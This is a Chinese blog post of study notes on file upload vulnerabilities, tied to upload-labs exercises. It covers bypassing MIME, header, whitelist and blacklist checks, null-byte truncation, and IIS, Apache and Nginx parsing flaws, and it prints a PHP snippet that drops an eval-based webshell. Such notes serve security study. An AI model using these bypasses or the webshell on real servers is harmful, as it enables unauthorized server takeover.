<!DOCTYPE html>
<html lang="en">
    <!-- title -->




<!-- keywords -->




<head>
    <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" >
    <meta name="author" content="Yi">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="Yi">
    
    <meta name="keywords" content="Yi's Blog,Yi">
    
    <meta name="description" content="">
    <meta name="description" content="文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞，因为用它获得服务器权限最快最直接。  特点：利用简单，危害大。 产生原因：缺少必要的校验">
<meta property="og:type" content="article">
<meta property="og:title" content="文件上传漏洞学习笔记">
<meta property="og:url" content="http://fecee.github.io/2020/05/10/UploadBug-Notes/index.html">
<meta property="og:site_name" content="Yi&#39;s Blog">
<meta property="og:description" content="文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞，因为用它获得服务器权限最快最直接。  特点：利用简单，危害大。 产生原因：缺少必要的校验">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2020-05-10T20:55:16.000Z">
<meta property="article:modified_time" content="2020-05-14T17:25:27.065Z">
<meta property="article:author" content="Yi">
<meta property="article:tag" content="Web安全">
<meta property="article:tag" content="上传漏洞">
<meta name="twitter:card" content="summary">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    
    <title>文件上传漏洞学习笔记 · Yi&#39;s Blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href= "/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    <link rel="stylesheet" href= "/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href= "/null" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script" />
    <link rel="preload" href="/scripts/main.js" as="script" />
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <script>
        var _hmt = _hmt || [];
        (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?50cd99f35c856a841abf8a72f40c45cf";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
        })();
    </script>
    
    <!-- 谷歌统计  -->
    
<meta name="generator" content="Hexo 4.2.0"><!-- hexo-inject:begin --><!-- hexo-inject:end --></head>

    
        
            <body class="post-body">
        
    
    
<!-- hexo-inject:begin --><!-- hexo-inject:end --><header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >Yi&#39;s Blog</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">文件上传漏洞学习笔记</a>
            </div>
    </div>
    
    <a class="home-link" href=/>Yi's Blog</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/egan-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            文件上传漏洞学习笔记
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "Web安全">Web安全</a>
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "上传漏洞">上传漏洞</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>Word count: <span class="post-count word-count">2.8k</span>Reading time: <span class="post-count reading-time">11 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2020/05/10</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <p>文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞，因为用它获得服务器权限最快最直接。</p>
<ul>
<li>特点：利用简单，危害大。</li>
<li>产生原因：缺少必要的校验<a id="more"></a>

</li>
</ul>
<p><strong>找文件上传点（关键）</strong>：</p>
<ul>
<li>管理后台页面</li>
<li>用户后台页面</li>
<li>前台页面</li>
<li>目录扫描 ==&gt;扫描到后台不需要登陆就能访问的上传页面</li>
</ul>
<h2 id="前端验证突破"><a href="#前端验证突破" class="headerlink" title="前端验证突破"></a>前端验证突破</h2><p>前端验证一般是通过JavaScript对上传操作进行控制。</p>
<h3 id="判断为前端验证"><a href="#判断为前端验证" class="headerlink" title="判断为前端验证"></a>判断为前端验证</h3><ul>
<li>右键查看源代码</li>
<li>直接上传文件，如果网站非常快弹出提示。</li>
</ul>
<h3 id="绕过前端验证"><a href="#绕过前端验证" class="headerlink" title="绕过前端验证"></a>绕过前端验证</h3><ul>
<li>通过浏览器审查元素对网页的代码查看，找到对文件格式或大小的限制然后修改即可;</li>
<li>通过Burpsuite工具对浏览器进行代理，抓包对包里的内容进行修改</li>
<li>浏览器禁用 JavaScript 脚本</li>
</ul>
<h3 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h3><p>uppload-labs Pass-01</p>
<h2 id="文件内容检查的突破"><a href="#文件内容检查的突破" class="headerlink" title="文件内容检查的突破"></a>文件内容检查的突破</h2><ul>
<li>Content-type检查</li>
<li>文件头检查</li>
<li><code>getimagesize()</code>检查</li>
<li><code>php_exif</code>模块检查</li>
<li><code>imagecreatefromjpeg</code>二次渲染</li>
</ul>
<h3 id="文件内容检查测试流程"><a href="#文件内容检查测试流程" class="headerlink" title="文件内容检查测试流程"></a>文件内容检查测试流程</h3><ol>
<li>上传一张正常图片，验证上传功能是否正常</li>
<li>最好直接上传一张图片马，可绕过<code>content-type</code>，文件头，<code>getimagesize()</code>，<code>php_exif</code>检查</li>
<li>针对二次渲染，寻找图片数据中不会被转换的部分，将代码插入其中</li>
</ol>
<h3 id="content-type-检查"><a href="#content-type-检查" class="headerlink" title="content-type 检查"></a>content-type 检查</h3><p>抓包将<code>content-type</code>改为图片形式（即’image/png’等），即可成功上传。</p>
<p>常见的MIME类型：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">text/html: HTML格式</span><br><span class="line">text/plain: 纯文本格式</span><br><span class="line">text/xml: XML格式</span><br><span class="line">image/gif: gif图片格式</span><br><span class="line">image/jpeg: jpg图片格式</span><br><span class="line">image/png: png图片格式</span><br><span class="line"></span><br><span class="line">以application开头的媒体格式类型：</span><br><span class="line"></span><br><span class="line">application/xhtml+xml: XHTML格式</span><br><span class="line">application/xml: XML数据格式</span><br><span class="line">application/atom+xml: Atom XML聚合格式</span><br><span class="line">application/json: JSON数据格式</span><br><span class="line">application/pdf: pdf格式</span><br><span class="line">application/msword: Word文档格式</span><br><span class="line">application/octet-stream: 二进制流数据（如常见的文件下载）</span><br><span class="line">application/x-www-form-urlencoded: <span class="tag">&lt;<span class="name">form</span> <span class="attr">encType</span>=<span class="string">””</span>&gt;</span>中默认的encType，form表单数据被编码为key/value格式发送到服务器（表单默认的提交数据的格式）</span><br><span class="line"></span><br><span class="line">另外一种常见的媒体格式是上传文件之时使用的：</span><br><span class="line"></span><br><span class="line">multipart/form-data: 需要在表单中进行文件上传时，就需要使用该格式</span><br></pre></td></tr></table></figure>

<p>实例：uppload-labs Pass-02</p>
<h3 id="文件头检查绕过"><a href="#文件头检查绕过" class="headerlink" title="文件头检查绕过"></a>文件头检查绕过</h3><ul>
<li>在文件头添加<ul>
<li>.gif, “GIF89A” <code>47 49 46 38 39 61</code></li>
<li>.JPEG;.JPE;.JPG，”JPGGraphicFile” <code>FF D8 FF E0 00 10 4A 46 49 46</code></li>
<li>.PNG <code>89 50 4E 47 0D 0A 1A 0A</code></li>
</ul>
</li>
<li>图片一句话</li>
<li>结合文件包含漏洞或者解析漏洞</li>
</ul>
<p>其他类型的文件头</p>
<table>
<thead>
<tr>
<th>格式</th>
<th>文件头</th>
</tr>
</thead>
<tbody><tr>
<td>TIFF (tif)</td>
<td><code>49 49 2A 00</code></td>
</tr>
<tr>
<td>Windows Bitmap (bmp)</td>
<td><code>42 4D</code></td>
</tr>
<tr>
<td>CAD (dwg)</td>
<td><code>41 43 31 30</code></td>
</tr>
<tr>
<td>Adobe Photoshop (psd)</td>
<td><code>38 42 50 53</code></td>
</tr>
<tr>
<td>Rich Text Format (rtf)</td>
<td><code>7B 5C 72 74 66</code></td>
</tr>
<tr>
<td>MS Word/Excel (xls.or.doc)</td>
<td><code>D0 CF 11 E0</code></td>
</tr>
<tr>
<td>MS Access (mdb)</td>
<td><code>53 74 61 6E 64 61 72 64 20 4A</code></td>
</tr>
<tr>
<td>ZIP Archive (zip)</td>
<td><code>50 4B 03 04</code></td>
</tr>
<tr>
<td>RAR Archive (rar)</td>
<td><code>52 61 72 21</code></td>
</tr>
<tr>
<td>Wave (wav)</td>
<td><code>57 41 56 45</code></td>
</tr>
<tr>
<td>AVI (avi)</td>
<td><code>41 56 49 20</code></td>
</tr>
<tr>
<td>Real Media (rm)</td>
<td><code>2E 52 4D 46</code></td>
</tr>
<tr>
<td>MPEG (mpg)</td>
<td><code>00 00 01 BA</code></td>
</tr>
<tr>
<td>MPEG (mpg)</td>
<td><code>00 00 01 B3</code></td>
</tr>
<tr>
<td>Quicktime (mov)</td>
<td><code>6D 6F 6F 76</code></td>
</tr>
<tr>
<td>Adobe Acrobat (pdf)</td>
<td><code>25 50 44 46 2D 31 2E</code></td>
</tr>
<tr>
<td>Windows Media (asf)</td>
<td><code>30 26 B2 75 8E 66 CF 11</code></td>
</tr>
<tr>
<td>MIDI (mid)</td>
<td><code>4D 54 68 64</code></td>
</tr>
</tbody></table>
<p>实例：</p>
<ul>
<li>uppload-labs Pass-13</li>
<li>uppload-labs Pass-14 <code>getimagesize()</code></li>
<li>uppload-labs Pass-14 <code>php_exif需要开启</code></li>
</ul>
<h3 id="二次渲染"><a href="#二次渲染" class="headerlink" title="二次渲染"></a>二次渲染</h3><p>imagecreatefromjpeg 实例：uppload-labs Pass-16</p>
<p>绕过方式：寻找渲染前后不变的地方，替换成一句话。最好用比对的工具做对比，例如二次渲染木马生成器，或者写一个脚本文件比较前后区别。</p>
<p><a href="https://secgeek.net/bookfresh-vulnerability/" target="_blank" rel="noopener">参考链接</a></p>
<p><a href="https://xz.aliyun.com/t/2657" target="_blank" rel="noopener">pass16详细分析</a></p>
<p><a href="https://github.com/gwjczwy/jpg_payload" target="_blank" rel="noopener">jpg_payload</a></p>
<h2 id="白名单验证的突破"><a href="#白名单验证的突破" class="headerlink" title="白名单验证的突破"></a>白名单验证的突破</h2><h3 id="修改MIME类型绕过白名单限制"><a href="#修改MIME类型绕过白名单限制" class="headerlink" title="修改MIME类型绕过白名单限制"></a>修改MIME类型绕过白名单限制</h3><p>与Content-type验证绕过相同</p>
<h3 id="00截断绕过白名单限制"><a href="#00截断绕过白名单限制" class="headerlink" title="00截断绕过白名单限制"></a>00截断绕过白名单限制</h3><p>截断的核心，就是chr(0)这个字符。先说一下这个字符，这个字符不为空(Null)，也不是空字符(“”)，更不是空格。当程序在输出含有chr(0)变量时，chr(0)后面的数据会被停止，换句话说，就是误把它当成结束符，后面的数据直接忽略，这就导致漏洞产生。</p>
<h4 id="条件"><a href="#条件" class="headerlink" title="条件"></a>条件</h4><ul>
<li>php版本小于5.3.4 详情关注<code>CVE-2006-7243</code></li>
<li>php的<code>magic_quotes_gpc</code>为<code>OFF</code>状态</li>
</ul>
<p>实例：</p>
<ul>
<li>uppload-labs Pass-11</li>
<li>uppload-labs Pass-12</li>
</ul>
<h4 id="能够进行截断的点"><a href="#能够进行截断的点" class="headerlink" title="能够进行截断的点"></a>能够进行截断的点</h4><p>文件名，路径</p>
<p>注意，submit提交方式(POST/GET)不一定为图片流(POST/GET)的请求方式。POST 不会像 GET 对 <code>%00</code> 进行解码，所以需要在十六进制中手动修改。，修改方式：例如在文件后缀或路径后加一个空格，此时空格为 <code>0x20</code>，在 Burpsuite 的 Hex 模式中手动改为 <code>0x00</code>。</p>
<h3 id="解析漏洞绕过白名单限制"><a href="#解析漏洞绕过白名单限制" class="headerlink" title="解析漏洞绕过白名单限制"></a>解析漏洞绕过白名单限制</h3><h4 id="双重拓展名"><a href="#双重拓展名" class="headerlink" title="双重拓展名"></a>双重拓展名</h4><p>Apache 文件名解析时，是从后面开始检查后缀，按最后一个合法后缀执行。如:<code>shell.php.xxx</code>因为<code>xxx</code>不被apache解析，所以apache会跳过 <code>.xxx</code> ，而解析最后一个后缀名，即<code>.php</code>，从而把这个文件当php文件解析了。</p>
<h4 id="IIS解析漏洞"><a href="#IIS解析漏洞" class="headerlink" title="IIS解析漏洞"></a>IIS解析漏洞</h4><h5 id="IIS-6-0"><a href="#IIS-6-0" class="headerlink" title="IIS 6.0"></a>IIS 6.0</h5><p><code>*.asp;1.jpg</code> 利用<code>;</code>截断。</p>
<h5 id="IIS-7-0-7-5-Nginx-lt-8-03"><a href="#IIS-7-0-7-5-Nginx-lt-8-03" class="headerlink" title="IIS 7.0/7.5/Nginx&lt;8.03"></a>IIS 7.0/7.5/Nginx&lt;8.03</h5><p>php.ini里默认<code>cgi.fix_pathinfo=1</code>，对其进行访问的时候，在URL路径后添加<code>.php</code>后缀名会当做php文件进行解析，漏洞由此产生。上传 <code>1.jpg</code> ， 访问 <code>http://www.xxx.com/1.jpg/.php</code>， 此 时 1.JPG 会被当做PHP 脚本文件来解析。</p>
<h4 id="大小写绕过"><a href="#大小写绕过" class="headerlink" title="大小写绕过"></a>大小写绕过</h4><p>可以利用字典排查，fuzz。</p>
<h2 id="黑名单验证的突破"><a href="#黑名单验证的突破" class="headerlink" title="黑名单验证的突破"></a>黑名单验证的突破</h2><h3 id="操作系统特性"><a href="#操作系统特性" class="headerlink" title="操作系统特性"></a>操作系统特性</h3><ul>
<li>Windows操作系统对<strong>大小写不敏感</strong>，即php和Php在windows看来是一样的</li>
<li>Windows系统下，如果上传的文件名中<code>test.php::$DATA</code>会在服务器上生成一个<code>test.php</code>的文— 件，其中内容和所 上传文件内容相同，并被解析。即上传文件xxx.php::$DATA = xxx.php</li>
<li>Windows下文件名结尾加入<code>., 空格, &lt;,· &gt;, &gt;&gt;&gt;,0x81-0xff</code>等字符，会被windows自动去除<br>例如: <code>xxx.php.</code>，绕过WAF，在服务器中被Windows剔除</li>
</ul>
<h3 id="语言特性"><a href="#语言特性" class="headerlink" title="语言特性"></a>语言特性</h3><table>
<thead>
<tr>
<th>语言</th>
<th>可解析后缀</th>
</tr>
</thead>
<tbody><tr>
<td>php</td>
<td>php, php5, php4 , php3, php2, pHp, pHp5, pHp4 ,pHp3, pHp2, html, htm, phtml, pht ,Html, Htm, pHtml</td>
</tr>
<tr>
<td>jsp</td>
<td>jsp, jspa, jspx, jsw, jsv, jspf, jtml, jSp, jSpx, jSpa, jSw, jSv, jSpf, jHtml</td>
</tr>
<tr>
<td>asp/aspx</td>
<td>asp, aspx, asa, asax, ascx, ashx, asmx, cer, aSp, aSpx, aSa, aSax, aScx, aShx, aSmx, cEr</td>
</tr>
</tbody></table>
<h3 id="中间件特性"><a href="#中间件特性" class="headerlink" title="中间件特性"></a>中间件特性</h3><ol>
<li>确定容器</li>
<li>尝试用解析漏洞上传</li>
</ol>
<h3 id="代码不严谨"><a href="#代码不严谨" class="headerlink" title="代码不严谨"></a>代码不严谨</h3><ol>
<li>双写绕过，例如<code>1.AsaspP</code></li>
<li>对于空格，点只做了单次过滤，例如<code>1.php. .</code>，过滤空格、点后，<code>1.php.</code></li>
</ol>
<h3 id="测试思路"><a href="#测试思路" class="headerlink" title="测试思路"></a>测试思路</h3><ol>
<li><p>手工测试</p>
</li>
<li><p>使用字典+burp，去fuzz后缀名寻找成功上传的思路 <code>upload-fuzz-dic-builder</code><br><a href="http://gv7.me/articles/2018/make-upload-vul-fuzz-dic/" target="_blank" rel="noopener">构造优质上传漏洞fuzz字典</a><br>注: 使用fuzz测试上传大小尽量小，缺点：<strong>产生大量上传文件</strong>，不推荐在没有任何测试的基础上直接fuzz。</p>
</li>
</ol>
<p>实例：</p>
<ul>
<li>uppload-labs Pass-03 特殊拓展名</li>
<li>uppload-labs Pass-06 过滤不严谨</li>
<li>uppload-labs Pass-10 双写绕过</li>
</ul>
<h2 id="解析漏洞"><a href="#解析漏洞" class="headerlink" title="解析漏洞"></a>解析漏洞</h2><h3 id="探查目标web服务器"><a href="#探查目标web服务器" class="headerlink" title="探查目标web服务器"></a>探查目标web服务器</h3><ol>
<li>通过查看相应的http请求，会在头部暴露出web服务器类型</li>
<li>安装浏览器插件 <code>Wappalyzer</code></li>
<li>通过第三方网站 <code>http://www.yunsee.cn/info.html</code></li>
</ol>
<h3 id="解析漏洞详解"><a href="#解析漏洞详解" class="headerlink" title="解析漏洞详解"></a>解析漏洞详解</h3><h4 id="IIS-5-X-6-0解析漏洞"><a href="#IIS-5-X-6-0解析漏洞" class="headerlink" title="IIS 5.X/6.0解析漏洞"></a>IIS 5.X/6.0解析漏洞</h4><ol>
<li><p>目录解析漏洞:<br>服务器默认会把<code>.asp</code>，<code>.asa</code>目录下的文件都解析成asp文件。<br>前提是可以控制<strong>文件上传的路径</strong>或者是<strong>文件名</strong>。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx.asp/xxx.jpg</span><br></pre></td></tr></table></figure>
</li>
<li><p>文件名解析漏洞:<br>服务器默认不会取解析分号后面的内容。<br>前提是可以控制<strong>文件名</strong>。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx.asp;.jpg</span><br></pre></td></tr></table></figure>
</li>
<li><p>畸形解析:<br>iis6.0下的可执行文件还有<code>asa cer cdx asax</code> 也会解析成 <code>asp</code>。<br>注意：不一定能解析<code>aspx</code>，因为<code>aspx</code>是.net 环境。</p>
</li>
</ol>
<h4 id="IIS-7-0-IIS-7-5-Nginx-lt-8-03"><a href="#IIS-7-0-IIS-7-5-Nginx-lt-8-03" class="headerlink" title="IIS 7.0/IIS 7.5/ Nginx &lt; 8.03"></a>IIS 7.0/IIS 7.5/ Nginx &lt; 8.03</h4><ol>
<li><p>利用解析图片中的代码上传webshell<br>如果开启<code>Fast -CGI</code>模式，上传 <code>1.jpg</code>，内容</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?PHP</span> fputs(fopen(<span class="string">'shell.php'</span>,<span class="string">'w'</span>),<span class="string">'&lt;?php eval($_POST[cmd])?&gt;'</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>然后访问<code>1.jpg/.php</code>,在这个目录下就会生成一句话木马shell.php。</p>
</li>
<li><p>fck+iis7.5</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a.aspx.a.aspx.jpg..jpg</span><br></pre></td></tr></table></figure>

</li>
</ol>
<h4 id="Apache解析漏洞"><a href="#Apache解析漏洞" class="headerlink" title="Apache解析漏洞"></a>Apache解析漏洞</h4><h5 id="不可识别解析后缀"><a href="#不可识别解析后缀" class="headerlink" title="不可识别解析后缀"></a>不可识别解析后缀</h5><ol>
<li><p>Apache的文件解析过程是从右到左开始判断解析,如果为不可识别的后缀解析,就再往左判断。</p>
</li>
<li><p>在Apache的解析中，除了“<code>php|php3|phtml</code>”等规定的后缀中，任何的后缀加入，都是不会被识别解析的，也会被跳过后缀处理。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dark5.php.k1.w2.a3 -&gt; dark5.php</span><br></pre></td></tr></table></figure>

</li>
</ol>
<h5 id="htaccess"><a href="#htaccess" class="headerlink" title=".htaccess"></a>.htaccess</h5><ol>
<li>htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。</li>
<li>通过htaccess文件，可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、 禁止目录列表、配置默认文档等功能。</li>
<li>该漏洞适用于目标web服务器为apache，并且<code>.htaccess</code><strong>可以被上传执行</strong>的情况。</li>
<li>当<code>.htaccess</code>文件内容为<code>SetHandler application/x-httpd-php</code>时，即设置当前目录所有文件都使用PHP解析，那么无论上传任何文件，只要文件内容符合PHP语言代码规范，就会被当作PHP执行。不符合则报错。</li>
<li>在Apache中如果需要启动 <code>.htaccess</code>，必须在<code>http.conf</code>中设置 <code>AllowOverride</code>为<code>All</code>。</li>
</ol>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">所有文件：</span><br><span class="line">SetHandler application/x-httpd-php</span><br><span class="line">或者：</span><br><span class="line"><span class="tag">&lt;<span class="name">FilesMatch</span> "<span class="attr">1.jpg</span>"&gt;</span> SetHandler application/x-httpd-php <span class="tag">&lt;/<span class="name">FilesMatch</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>实例：uppload-labs Pass-04</p>
<h4 id="Nginx解析漏洞"><a href="#Nginx解析漏洞" class="headerlink" title="Nginx解析漏洞"></a>Nginx解析漏洞</h4><ol>
<li><p>CGI与IIS 7.X 相同</p>
</li>
<li><p>空字节代码执行（00截断）</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dark5.jpg%00.php</span><br></pre></td></tr></table></figure>

</li>
</ol>
<h2 id="双文件上传"><a href="#双文件上传" class="headerlink" title="双文件上传"></a>双文件上传</h2><p>应用场景：</p>
<ol>
<li>南方/良精CMS</li>
<li>正则默认匹配第一个filename的情况下（双写Filename方式绕过）</li>
</ol>
